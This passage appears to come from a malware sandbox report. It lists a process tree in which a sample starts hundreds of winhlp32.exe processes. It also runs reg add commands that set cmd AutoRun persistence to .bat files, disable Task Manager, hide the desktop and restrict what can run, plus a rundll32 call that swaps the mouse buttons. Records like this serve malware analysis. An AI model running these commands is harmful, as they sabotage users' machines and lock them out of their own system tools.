      winhlp32
      4⤵
      PID:8700
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:8712
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:8720
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:8792
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:8832
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:8840
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:9132
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:9176
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:9212
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:8248
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:8316
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:8392
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:9232
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:9248
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:9312
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:9328
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:9340
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:9452
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:9504
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:9584
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:9600
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:9648
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:9656
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:9668
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:9680
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:9836
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:9876
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:10592
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:12088
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:12124
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:12136
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:12148
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:12172
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:12192
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:12200
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:12212
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:12224
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:12268
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:11664
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:12312
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:12324
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:12372
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:13624
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:13652
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:13664
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:13676
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:13720
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:13760
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:13776
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:15440
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:15472
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:15492
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:15512
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:15528
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:15536
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:15548
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:15564
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:15576
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:15588
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:15596
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:15612
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:15620
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:15636
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:15652
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:15664
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:15676
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:15688
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:15700
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:15712
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:15724
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:15740
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:15752
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:15808
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:15816
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:15828
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:15992
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:16084
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:16148
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:16180
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:16200
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:16284
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:16336
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:16364
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:16636
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:16652
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:16664
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:16684
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:16696
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:16732
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:16744
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:16752
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:16768
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:16780
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:16796
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:16816
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:16908
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:16916
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:16932
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:16972
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:16988
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:16996
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:17116
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:17132
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:17160
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:17168
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:17232
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:17316
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:17376
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:17396
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:15312
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:17056
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:10052
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:10196
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:17048
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:17464
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:17476
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:17488
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:17500
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:17512
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:3636
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:18980
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:19484
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:19496
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:19540
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:19572
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:19588
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:21036
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:23096
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:24268
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:25236
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:25808
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:26516
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:26816
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:27256
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:27492
- - C:\Windows\system32\reg.exe
    reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "C:\Windows\system32\celeryfixv5.bat" /f
    3⤵
    PID:4404
- - C:\Windows\system32\reg.exe
    reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "C:\Windows\system32\Windows64Driver.bat" /f
    3⤵
    PID:5108
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REGDWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:4280
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun /v 1 /t REGDWORD /d C:\Windows\explorer.exe /f
    3⤵
    - Modifies registry key
    PID:2384
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache /v @C:\WINDOWS\system32\SHELL32.dll,-8964 /t REG_SZ /d Sakpot /F
    3⤵
    - Modifies registry key
    PID:1148
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:1108
- - C:\Windows\system32\reg.exe
    reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:3724
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer
    3⤵
    - Modifies registry key
    PID:424
- - C:\Windows\system32\rundll32.exe
    C:\Windows/system32/rundll32 user32, SwapMouseButton
    3⤵
    PID:428
- - C:\Windows\system32\reg.exe
    reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REGSZ /d "C:\Windows\syste m32\batinit.bat" /f
    3⤵
    PID:6484
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:6416
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:7144
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:5212
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:6536
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:7244
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:7256
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:7272
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:7288
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:7300
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:7400
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:7452
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:8748
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:9768
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:9884
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:9900
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:9924
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:10764
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:10784
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:10816
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:10836
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:10848
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:10888
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:10920
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:11028
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:11048
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:11068
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:11080
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:12504
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:12552
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:12588
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:12600
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:12628
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:12636
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:12652
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:12692
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:12760
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:12772
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:12784
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:12844
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:12864
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:12876
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:12892
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:12916
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:12932
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:12940
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:12956
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:12972
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:13016
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:13028
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:13052
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:13256
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:13308
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:12468
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:10660
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:13348
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:13364
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:13688
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:13788
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:13796
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:13808
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:13836
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:13848
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:13896
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:13916
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:13928
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:16000
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:17324
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:18008
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:18028
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:18044
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:18060
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:18080
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:18100
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:18112
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:18136
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:18168
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:18176
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:18204
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:18220
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:18228
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:18520
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:18616
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:18628
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:18644
- C:\Windows\system32\reg.exe
  reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "C:\Windows\system32\celeryfixv5.bat" /f
  2⤵
  PID:2364
- C:\Windows\system32\reg.exe
  reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "C:\Windows\system32\Windows64Driver.bat" /f
  2⤵
  PID:3600
- C:\Windows\system32\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REGDWORD /d 1 /f
  2⤵
  - Modifies registry key
  PID:3572
- C:\Windows\system32\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun /v 1 /t REGDWORD /d C:\Windows\explorer.exe /f
  2⤵
  - Modifies registry key
  PID:3960
- C:\Windows\system32\reg.exe
  reg add HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache /v @C:\WINDOWS\system32\SHELL32.dll,-8964 /t REG_SZ /d Sakpot /F
  2⤵
  - Modifies registry key
  PID:684
- C:\Windows\system32\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
  2⤵
  - Modifies registry key
  PID:3940
- C:\Windows\system32\reg.exe
  reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f
  2⤵
  - Modifies registry key
  PID:2872
- C:\Windows\system32\reg.exe
  reg add HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer
  2⤵
  - Modifies registry key
  PID:1812
- C:\Windows\system32\rundll32.exe
  C:\Windows/system32/rundll32 user32, SwapMouseButton
  2⤵
  PID:2088
- C:\Windows\system32\reg.exe
  reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REGSZ /d "C:\Windows\syste m32\batinit.bat" /f
  2⤵
  PID:852
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:1172
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:3536
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:3892
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:3788
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:4388
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:2628
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:2944
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:2984
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:2500
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:4144
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:4852
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:3396
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:5112
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:4296
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:1924
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:5012
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:2288
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:2120
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:5048
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:4564
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:2544
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:440
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:3168
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:1996
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:1720
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:1528
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:1972
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:4448
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:4624
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:4884
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:1604
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:4772
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:4708
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:2824
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:4084
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:4944
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:4276
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:2360
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:2364
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:3164
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:4036
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:596
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:3132
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:3312
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:1684
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:4400
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:320
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:3828
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:548
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:2636
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:3724
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:4384
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:1612
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:2692
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:2104
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:4092
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:4344
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:5128
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:5140
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:5156
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:5196
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:5216
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:5244
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:5252
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:5488
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:5496
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:5524
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:5536
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:5544
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:5556
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:5568
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:5596
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:5608
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:5648
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:5656
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:5672
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:5756
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:5768
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:5784
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:5796
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:5812
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:5852
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:5888
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:5980
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:6004
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:6016
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:6024
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:6032
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:6044
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:6124
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:6132
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:6568
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:6588
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:6600
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:6620
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:6632
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:6644
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:6656
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:6684
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:6696
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:6716
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:6732
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:6760
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:6772
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:6784
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:6804
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:6816
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:6944
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:6976
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:6988
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:6520
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:220
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:6508
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:6548
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:6560
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:7160
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:7264
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:7280
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:7492
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:7504
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:7532
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:7552
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:7636
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
